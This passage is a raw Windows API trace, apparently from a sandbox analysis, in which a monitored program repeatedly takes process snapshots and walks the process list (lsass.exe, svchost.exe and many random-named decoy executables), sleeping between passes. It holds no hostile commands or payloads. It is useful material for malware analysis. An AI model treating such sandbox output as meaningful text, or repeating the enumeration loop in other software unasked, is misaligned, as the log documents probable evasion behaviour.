lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0109.269] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0109.270] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0109.271] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0109.284] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.285] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.286] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0109.287] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0109.288] CloseHandle (hObject=0xbc) returned 1 [0109.288] Sleep (dwMilliseconds=0x12c) [0109.604] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0109.609] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.609] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.610] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.611] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.611] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.612] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.613] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.613] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.614] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.615] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0109.615] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.616] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.617] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.617] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.618] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.619] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.619] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.620] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.620] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.622] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.623] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.625] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0109.626] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.627] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.628] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.629] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.630] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0109.631] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0109.633] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0109.634] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.635] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.636] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.638] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.639] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.640] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.641] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.643] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0109.644] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0109.645] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0109.657] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0109.658] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0109.659] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0109.661] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0109.662] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0109.663] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0109.664] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.665] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.666] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0109.667] CloseHandle (hObject=0xc4) returned 1 [0109.667] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0109.672] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.672] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.673] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.674] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.674] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.675] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.676] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.676] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.677] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.678] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0109.678] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.679] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.680] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.680] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.681] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.681] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.682] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.683] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.683] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.684] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.687] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0109.688] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
